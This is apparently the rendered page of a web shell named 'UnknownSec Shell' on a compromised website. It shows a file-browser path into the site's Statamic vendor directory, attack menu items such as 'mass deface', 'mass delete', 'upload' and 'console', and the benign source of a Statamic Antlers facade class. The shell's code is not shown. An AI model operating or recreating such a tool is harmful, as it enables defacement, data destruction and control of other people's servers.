shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Facades
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Antlers.php
<?php namespace Statamic\Facades; use Illuminate\Support\Facades\Facade; use Statamic\Contracts\View\Antlers\Parser; use Statamic\View\Antlers\AntlersString; /** * @method static Parser parser() * @method static mixed usingParser(Parser $parser, \Closure $callback) * @method static AntlersString parse(string $str, array $variables = []) * @method static string parseLoop(string $content, array $data, bool $supplement = true, array $context = []) * @method static array identifiers(string $content) * * @see \Statamic\View\Antlers\Antlers */ class Antlers extends Facade { protected static function getFacadeAccessor() { return \Statamic\View\Antlers\Antlers::class; } }
© 2026 UnknownSec